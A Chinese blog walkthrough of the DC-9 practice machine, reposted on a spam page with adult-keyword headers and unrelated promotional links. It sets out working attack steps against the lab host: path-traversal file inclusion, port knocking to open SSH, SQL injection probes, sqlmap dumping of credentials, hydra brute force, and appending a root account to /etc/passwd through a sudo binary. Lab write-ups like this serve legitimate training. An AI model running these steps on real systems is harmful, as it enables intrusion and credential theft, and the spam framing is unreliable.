中文亚洲精品无码_熟女乱子伦免费_人人超碰人人爱国产_亚洲熟妇女综合网

當(dāng)前位置: 首頁 > news >正文

游戲網(wǎng)站怎么做推廣成人大學(xué)報(bào)名官網(wǎng)入口

游戲網(wǎng)站怎么做推廣,成人大學(xué)報(bào)名官網(wǎng)入口,關(guān)于做網(wǎng)站的書籍,心悅會(huì)員免做卡網(wǎng)站信息收集 sudo arp-scan -l 列出局域網(wǎng)主機(jī) arp-scan向局域網(wǎng)中所有可能的ip地址發(fā)出arp請(qǐng)求包,如果得到arp回應(yīng),就證明局域網(wǎng)中某臺(tái)主機(jī)使用了該ip dc9的ip : 192.168.146.133 訪問網(wǎng)頁 cms為Debian 端口掃描 22端口是filtered 隱藏目…

信息收集

sudo arp-scan -l 列出局域網(wǎng)主機(jī)

arp-scan向局域網(wǎng)中所有可能的ip地址發(fā)出arp請(qǐng)求包,如果得到arp回應(yīng),就證明局域網(wǎng)中某臺(tái)主機(jī)使用了該ip

dc9的ip : 192.168.146.133?

訪問網(wǎng)頁 cms為Debian

端口掃描

22端口是filtered

隱藏目錄掃描

dirb http:// -X.php

訪問logout.php 或者session.php 都會(huì)提示已經(jīng)以admin身份登錄

下面還有一句File does not exist??

沒法點(diǎn)擊添加記錄,我猜應(yīng)該是像flask那樣用了session?

但是有文件包含漏洞

把可重復(fù)使用的函數(shù)寫到單個(gè)文件中,在使用某些函數(shù)時(shí),直接調(diào)用此文件

程序開發(fā)人員一般希望代碼更靈活,將被包含的文件設(shè)置為變量,用來進(jìn)行動(dòng)態(tài)調(diào)用

文件包含漏洞:用戶對(duì)這個(gè)變量可控而且服務(wù)端又沒有做合理的校檢或者校檢被繞過

現(xiàn)在要找到這個(gè)變量 ?把變量值設(shè)為敏感文件路徑或者包含函數(shù)的文件(這個(gè)需要上傳)

變量通常為file?

就是把函數(shù)寫進(jìn)文件里方便調(diào)用,設(shè)置變量,

?file=../../../../etc/passwd

ssh是被filtered,需要繞過防火墻進(jìn)行探測(cè)

Debian的配置文件是?/etc/network/interfaces 剛好搜到了網(wǎng)絡(luò)配置文件

翻譯

環(huán)回接口,是虛擬的網(wǎng)絡(luò)接口,不與任何物理硬件設(shè)備關(guān)聯(lián),ip地址為127.0.0.1 或::1 可以用來測(cè)試

主網(wǎng)絡(luò)接口,連接到物理網(wǎng)絡(luò)硬件,如以太網(wǎng)接口,無線網(wǎng)卡的接口,有1個(gè)或多個(gè)ip地址

沒有查看到 etc/network/interfaces.d內(nèi)容

看到了knockd敲門服務(wù)

其中的/etc/knockd.conf里的配置會(huì)導(dǎo)致ssh連接被拒絕,它通過動(dòng)態(tài)的添加iptables規(guī)則來隱藏系統(tǒng)開啟的服務(wù)

獲得ssh開門密碼 7649 8475 9842

使用自定義的一系列序列號(hào)來“敲門”,使系統(tǒng)開啟需要訪問的服務(wù)端口,才能對(duì)外訪問

nmap -p 7469 196.168.146.133 通過nmap發(fā)送ARP包完成敲門服務(wù)

8475? 9842?

或者nc??

for x in 7469 8475 9842 22 ;do nc 192.168.146.133?$x;done

或者安裝apt install knockd

執(zhí)行sudo knockd 192.168.146.133 7469 8475 9842

然后nmap 看一下22端口是否打開

然后就可以ssh登錄了,但是沒有用戶名和密碼,那就暴力破解

剛剛的/etc/passwd有用戶名,寫入用戶名字典?

密碼的話,要么用通用字典,但我參考其他人的博客,數(shù)據(jù)庫的一張表里有

sql注入

sql注入是:因?yàn)榍岸溯斎肟刂撇粐?yán)格造成的漏洞,使得攻擊者可以輸入對(duì)后端數(shù)據(jù)庫有危害的字符串或符號(hào),使得后端數(shù)據(jù)庫產(chǎn)生回顯或執(zhí)行命令

從注入?yún)?shù)類型分:數(shù)字型注入、字符型注入

從注入效果分:報(bào)錯(cuò)注入、無顯盲注(布爾盲注、延時(shí)盲注)、聯(lián)合注入、堆疊注入、寬字節(jié)注入、二次注入

從提交方式分:GET注入、POST注入、HTTP頭注入(UA注入、XFF注入)、COOKIE注入

注入的常見位置:

URL參數(shù)

表單輸入:應(yīng)用程序中的表單輸入框,如用戶名、密碼、搜索框等

Cookie:應(yīng)用程序使用 Cookie 來存儲(chǔ)用戶信息或會(huì)話狀態(tài),攻擊者可以修改 Cookie 中的值來進(jìn)行?注入

HTTP頭部

數(shù)據(jù)庫查詢語句:在應(yīng)用程序中直接拼接 SQL 查詢語句

盲注并不會(huì)返回錯(cuò)誤信息,使得sql注入的難度提高

報(bào)錯(cuò)型注入則是利用了MySQL的第8652號(hào)bug :Bug #8652 group by part of rand() returns duplicate key error來進(jìn)行的盲注,使得MySQL由于函數(shù)的特性返回錯(cuò)誤信息,進(jìn)而我們可以顯示我們想要的信息

有1個(gè)搜索框 可以輸入“姓”或者“名” 搜多 Display Allm Records中的記錄

但是url中沒有參數(shù),推測(cè)表單提交方式是post ,也可以抓包,看到數(shù)據(jù)在消息體里

一個(gè)登錄框 可以編輯這些記錄

對(duì)搜索框和登陸界面測(cè)試是否存在sql注入,是在輸入框輸入,并非url ,因?yàn)檫@兩url都沒有參數(shù)

輸入sql注入語句

1' and 1=1#
1' and 1=2#
都不會(huì)報(bào)錯(cuò)

# 是注釋符號(hào),后面的部分都是注釋

'? 單引號(hào)用于表示字符串的開始和結(jié)束

單引號(hào)閉合 ,假設(shè)sql查詢中,某個(gè)字段是由單引號(hào)'括起來的,通過一個(gè)額外的單引號(hào)閉合這個(gè)字段, 然后可以插入攻擊者自己的sql命令

比如

SELECT?*?FROM?users?WHERE?id?=?'[user?input]'
然后用戶輸入1' and 1=1#

SELECT?*?FROM?users?WHERE?id?=?'1'?AND?1=1#'

1=1總是為真,不會(huì)改變?cè)胁樵兘Y(jié)果

1=2總是為假,如果返回不同的結(jié)果,比如錯(cuò)誤,那么就有sql注入漏洞

并不代表著不存在sql注入漏洞,可能是web服務(wù)器屏蔽了回顯報(bào)錯(cuò)信,這個(gè)時(shí)候我們就無法判斷閉合形式是否為單引號(hào)等,只能盲猜一手,而且因?yàn)椴荒軋?bào)錯(cuò),也就無法使用order by去判斷查詢字段長(zhǎng)度,但還可以使用union select來判斷

union是聯(lián)合查詢,合并兩個(gè)或多個(gè)select語句的結(jié)果集,每個(gè)select必須選擇相同數(shù)量的列,列必須擁有相似的數(shù)據(jù)類型(就是數(shù)據(jù)類型可以轉(zhuǎn)化,比如數(shù)字字符串和數(shù)字)

比如兩張表

執(zhí)行union

select 1會(huì)原封不動(dòng)的回顯出來,字段名為1,數(shù)據(jù)為1

首先盲猜為單引號(hào)閉合:

1' union select 1#
1' union select 1,2#
1' union select 1,2,3#
1' union select 1,2,3,4#
1' union select 1,2,3,4,5#
當(dāng)輸入1' union select 1,2,3,4,5,6#

sqlmap爆破

?參考利用sqlmap進(jìn)行POST注入_sqlmap post-CSDN博客

用Burp抓包,然后保存抓取到的內(nèi)容,右鍵 點(diǎn)擊 copy to files 保存為post.txt,然后把它放至某個(gè)目錄下

sqlmap -r "/home/kali/Desktop/package1" -p search?--dbs? (這個(gè)行不通)

表示加載一個(gè)文件,-p指定參數(shù) 是search

--dbs列出所有數(shù)據(jù)庫

進(jìn)入web開發(fā)者模式,點(diǎn)擊network,然后在目標(biāo)網(wǎng)頁的搜索欄中輸入1搜索,開發(fā)者工具中出現(xiàn)結(jié)果,翻閱查看信息,發(fā)現(xiàn)result.php的Request中出現(xiàn)信息

爆數(shù)據(jù)庫名,由于是POST請(qǐng)求發(fā)送數(shù)據(jù),所以這里指定–date參數(shù)為search

列數(shù)據(jù)庫:

sqlmap -u "http://192.168.146.133/results.php" --data "search=1" --dbs

有3個(gè) information_schema Staff users

查看 users里面的表

sqlmap -u "http://192.168.146.133/results.php" --data "search=1" -D users?--tables

這個(gè)不知道為啥沒結(jié)果,別的博客也是一樣的命令都有結(jié)果

然后我就直接參考其他人的

sqlmap -u "http://192.168.146.133/results.php" --data "search=1" -D users -T UserDetails -C username,password --dump

--columns

-D [數(shù)據(jù)庫名] -T [表名] -C [列名] --dump[列出字段的值]

ssh爆破

可以復(fù)制掃描結(jié)果,讓ai整理出來,我用的智譜清言

用戶名寫入字典

密碼寫入字典

hydra -L user.txt -P passwd.txt -o ssh.txt -vV -t ip ?ssh -s 22 ??
-L 指定用戶字典文件?
-P 指定密碼字典文件 ?
-o 把成功的輸出到ssh.txt文件?
-vV 顯示詳細(xì)信息 ?
-s 指定其他端口 如果要修改默認(rèn)22端口,可以使用 -s 參數(shù)

hydra -L username.txt -P pass.txt ssh://192.168.146.133

ssh登錄 ssh 用戶名@ip?

chandlerb?UrAG0D!

ssh janitor@192.168.146.133

要用ls-al查看隱藏的目錄和文件

d表示目錄 三個(gè)一組,所有者,所屬組,其他用戶

l是符號(hào)鏈接也稱軟鏈接,指向另一個(gè)文件或目錄,(類似于windows的快捷方式)

看到了secrets-for-putin 是秘密的意思,查看下

重寫一個(gè)新的newpass.txt,這樣能加快速度,再次ssh爆破

login: fredf password: B4-Tru3-001

登錄

沒看到有用信息

git提權(quán) sudo -l

cat /opt/devstuff/dist/test/test 這個(gè)文件具有sudo權(quán)限,但是里邊內(nèi)容是亂碼

查看文件的執(zhí)行權(quán)限 能讀 和執(zhí)行

執(zhí)行這個(gè)文件看一下有什么功能

查找test.py的路徑

find / -name "test.py" 2>/dev/null

查看代碼? 會(huì)把第一個(gè)文件寫到第二個(gè)文件里邊 "a" 是追加模式 如果第二個(gè)文件有內(nèi)容就會(huì)把第一個(gè)文件的內(nèi)容追加到末尾 可以在這個(gè)test.py里邊追加一個(gè)執(zhí)行/bin/bash的語句 執(zhí)行的時(shí)候會(huì)有一個(gè)root的shell

權(quán)限,不能修改

生成密碼

openssl passwd -1 -salt hack123456

-1 的意思是使用md5加密算法

-salt 自動(dòng)插入一個(gè)隨機(jī)數(shù)作為文件內(nèi)容加密

hack 123456 用戶名和密碼

查看格式 x表示有密碼

將賬戶密碼寫到/tmp/passwd

在/etc/passwd寫進(jìn)具有root權(quán)限的用戶和密碼

echo 'hacker:$1$hack$.JxSX4bOP1WSqH0kCgs9Y.:0:0:/root:/bin/bash' >> /tmp/passwd

執(zhí)行test

sudo ./test /tmp/passwd /etc/passwd

用戶名是hacker 密碼是123456?因?yàn)閑cho寫錯(cuò)了?拿到flag


?

http://www.risenshineclean.com/news/34698.html

相關(guān)文章:

  • 網(wǎng)站制作應(yīng)該注意到的問題seo有哪些優(yōu)缺點(diǎn)?
  • 營(yíng)銷型網(wǎng)站建設(shè)公司價(jià)格經(jīng)典網(wǎng)絡(luò)營(yíng)銷案例
  • openshift安裝wordpress密碼忘記百度seo關(guān)鍵詞報(bào)價(jià)
  • wordpress模板工作室佛山網(wǎng)絡(luò)公司 樂云seo
  • 服裝設(shè)計(jì)圖seo營(yíng)銷推廣服務(wù)公司
  • 網(wǎng)站設(shè)計(jì)怎么做鏈接中國(guó)疫情最新消息
  • 做網(wǎng)站推廣的方法佛山關(guān)鍵詞排名效果
  • 食藥監(jiān)局網(wǎng)站建設(shè)方案濰坊網(wǎng)站seo
  • 90設(shè)計(jì)網(wǎng)站可以商用嗎學(xué)生班級(jí)優(yōu)化大師
  • 個(gè)人網(wǎng)站有什么缺點(diǎn)it人必看的網(wǎng)站
  • 西寧做網(wǎng)站的公司力請(qǐng)君博d百度網(wǎng)站關(guān)鍵詞排名查詢
  • 高端品牌男鞋有哪些優(yōu)化營(yíng)商環(huán)境心得體會(huì)個(gè)人
  • 哪個(gè)網(wǎng)站 的域名最便宜seo推廣外包企業(yè)
  • 模板網(wǎng)站 可以做推廣嗎如何優(yōu)化搜索引擎
  • 招聘網(wǎng)站上怎么做推廣青島網(wǎng)站建設(shè)公司電話
  • 什么網(wǎng)站做外貿(mào)最好推廣平臺(tái)有哪些
  • 大石橋網(wǎng)站建設(shè)百度關(guān)鍵字優(yōu)化價(jià)格
  • javaweb做新聞網(wǎng)站北京百度推廣電話號(hào)碼
  • 室內(nèi)環(huán)保網(wǎng)站模板代碼seo網(wǎng)站優(yōu)化培訓(xùn)怎么做
  • 做的好微信商城網(wǎng)站嗎seo顧問服務(wù)四川
  • 福田做棋牌網(wǎng)站建設(shè)哪家公司便宜信息發(fā)布平臺(tái)推廣
  • 制作精美網(wǎng)站建設(shè)售后完善信息流廣告代運(yùn)營(yíng)
  • 天津做網(wǎng)站的公司營(yíng)銷網(wǎng)絡(luò)推廣哪家好
  • 手機(jī)網(wǎng)站模板開發(fā)工具seo網(wǎng)絡(luò)營(yíng)銷推廣公司深圳
  • 相冊(cè)模版網(wǎng)站圖片展示成人再就業(yè)培訓(xùn)班
  • 網(wǎng)站流量少宣傳產(chǎn)品的方式
  • 請(qǐng)人做網(wǎng)站后臺(tái)密碼推廣模式包括哪些模式
  • 復(fù)興網(wǎng)站制作網(wǎng)絡(luò)推廣文案策劃
  • 成都網(wǎng)站建設(shè)哪兒濟(jì)南興田德潤(rùn)怎么聯(lián)系婁底seo
  • 網(wǎng)站的反鏈要怎么做近期國(guó)內(nèi)熱點(diǎn)新聞事件